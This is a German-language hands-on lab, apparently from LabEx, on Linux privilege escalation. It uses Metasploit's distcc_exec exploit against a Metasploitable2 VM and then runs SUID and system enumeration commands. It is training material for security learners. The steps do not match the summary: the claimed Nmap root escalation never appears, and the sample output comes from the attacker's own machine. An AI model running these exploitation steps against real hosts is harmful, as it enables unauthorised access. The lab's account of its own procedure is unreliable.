Privilege Escalation auf einer Linux-Maschine mit Nmap durchführen

NmapNmapBeginner
Jetzt üben

💡 Dieser Artikel wurde von AI-Assistenten übersetzt. Um die englische Version anzuzeigen, können Sie hier klicken

Einführung

In diesem Lab lernen Sie, wie Sie nach erfolgreicher Anmeldung als Nicht-Root-Benutzer auf einem Linux-Rechner die Benutzerrechte erhöhen können. Während es online viele Tutorials zur Rechteerhöhung (Privilege Escalation) unter Windows gibt, konzentriert sich dieses Lab speziell auf die Rechteerhöhung unter einem Linux-Betriebssystem.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL nmap(("Nmap")) -.-> nmap/NmapGroup(["Nmap"]) nmap/NmapGroup -.-> nmap/host_discovery("Host Discovery Techniques") nmap/NmapGroup -.-> nmap/os_version_detection("OS and Version Detection") subgraph Lab Skills nmap/host_discovery -.-> lab-416129{{"Privilege Escalation auf einer Linux-Maschine mit Nmap durchführen"}} nmap/os_version_detection -.-> lab-416129{{"Privilege Escalation auf einer Linux-Maschine mit Nmap durchführen"}} end

Vorbereitung der Umgebung

In diesem Schritt starten wir die erforderlichen Komponenten der Lab-Umgebung, einschließlich des Kali Linux-Containers und der Metasploitable2-Virtual Machine.

  1. Starten Sie die Metasploitable2-Virtual Machine, indem Sie den folgenden Befehl im Terminal ausführen:
sudo virsh start Metasploitable2

Warten Sie, bis die Zielmaschine gestartet ist. Dies kann 1-3 Minuten dauern.

  1. Testen Sie, ob die Virtual Machine gestartet wurde, indem Sie den Hostnamen target per Ping testen:
ping 192.168.122.102

Drücken Sie Ctrl+C, um den Ping-Vorgang zu beenden.

  1. Starten Sie den Kali Linux-Container und greifen Sie auf seine Bash-Shell zu:
docker run -ti --network host b5b709a49cd5 bash
  1. Testen Sie innerhalb des Kali-Containers die Netzwerkkonnektivität, indem Sie den Hostnamen target per Ping testen:
ping 192.168.122.102

Drücken Sie Ctrl+C, um den Ping-Vorgang zu beenden.

Erste Zugangsmöglichkeit zur Zielmaschine erhalten

In diesem Schritt verwenden wir das Metasploit Framework (MSF) im Kali-Container, um erstmals Zugang zur Metasploitable2-Zielmaschine zu erhalten.

  1. Starten Sie die Metasploit-Konsole innerhalb des Kali-Containers:
cd ~
msfconsole
  1. Verwenden Sie innerhalb der Metasploit-Konsole das distcc_exec-Exploit-Modul:
use exploit/unix/misc/distcc_exec
  1. Legen Sie die IP-Adresse des Zielhosts fest:
set RHOST 192.168.122.102
  1. Starten Sie das Exploit, um Zugang zur Zielmaschine zu erhalten:
exploit

Nach erfolgreicher Exploitation sollte eine Befehlsshell-Sitzung geöffnet werden, was darauf hinweist, dass Sie Zugang zur Zielmaschine erhalten haben.

Drücken Sie Ctrl+D, um die Metasploit-Konsole zu beenden, und starten Sie dann die Prüfung.

Überprüfung der aktuellen Benutzerrechte

Nachdem Sie erstmals Zugang erhalten haben, müssen Sie die Rechte des aktuellen Benutzers überprüfen, um festzustellen, ob eine weitere Rechteerhöhung (Privilege Escalation) erforderlich ist.

  1. Wenn Sie nicht in der Metasploit-Konsole sind, starten Sie zunächst die Metasploit-Konsole:
cd ~
msfconsole
  1. Überprüfen Sie den aktuellen Benutzer:
whoami
  1. Überprüfen Sie die Benutzer-ID und die Gruppeninformationen:
id

Wenn die Benutzer-ID nicht 0 (root) ist, müssen Sie die Rechte erhöhen, um administrative Zugriffsrechte zu erhalten.

Drücken Sie Ctrl+D, um die Metasploit-Konsole zu beenden, und starten Sie dann die Prüfung.

Systeminformationen sammeln

Bevor Sie versuchen, die Benutzerrechte zu erhöhen (Privilege Escalation), müssen Sie Informationen über das Zielsystem sammeln, um potenzielle Sicherheitslücken zu identifizieren.

  1. Wenn Sie nicht in der Metasploit-Konsole sind, starten Sie zunächst die Metasploit-Konsole:
cd ~
msfconsole
  1. Überprüfen Sie die Linux-Distributionsversion:
lsb_release -a

Hier ist ein Beispiel für die Ausgabe, die Sie sehen könnten:

[*] exec: lsb_release -a

No LSB modules are available.
Distributor ID: Kali
Description:    Kali GNU/Linux Rolling
Release:        2023.2
Codename:       kali-rolling
  1. Überprüfen Sie die Kernel-Version:
uname -a

Hier ist ein Beispiel für die Ausgabe, die Sie sehen könnten:

Linux iZj6ceecakbzgu9eomquhhZ 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64 GNU/Linux
  1. Suchen Sie nach SUID-Dateien, die möglicherweise für die Rechteerhöhung ausgenutzt werden können:
find / -perm -u=s -type f 2> /dev/null

In der Ausgabe sollten Sie die Binärdatei /usr/bin/nmap sehen, die in älteren Versionen eine bekannte Sicherheitslücke für die Rechteerhöhung aufweist. Drücken Sie Ctrl+C, um die Suche zu beenden.

Drücken Sie Ctrl+D, um die Metasploit-Konsole zu beenden, und starten Sie dann die Prüfung.

Zusammenfassung

In diesem Lab haben Sie gelernt, wie Sie nach dem ersten Zugang als Nicht-Root-Benutzer auf einer Linux-Maschine die Benutzerrechte erhöhen können (Privilege Escalation). Wir haben begonnen, indem wir die LabEx-Umgebung mit dem Kali Linux-Container und der Metasploitable2-Virtual Machine eingerichtet haben. Anschließend haben wir das Metasploit Framework verwendet, um die Distcc-Sicherheitslücke auszunutzen und erstmals Zugang zur Zielmaschine zu erhalten.

Nachdem wir überprüft haben, dass wir kein Root-Benutzer sind, haben wir Informationen über das Zielsystem gesammelt, wie z. B. die Linux-Distributionsversion, die Kernel-Version und SUID-Dateien. Wir haben die Nmap-Binärdatei als potenzielle Sicherheitslücke identifiziert und sie ausgenutzt, um unsere Rechte auf Root zu erhöhen.

Durch die Absolvierung dieses Labs haben Sie praktische Erfahrungen mit dem Prozess der Rechteerhöhung auf Linux-Systemen gesammelt, was eine kritische Fähigkeit auf dem Gebiet der Cybersicherheit ist. Sie haben auch gelernt, wie Sie verschiedene Linux-Befehle für die Systemenumeration und -ausnutzung verwenden, sowie wie Sie Sicherheitslücken in Software nutzen können, um erhöhten Zugang zu erhalten.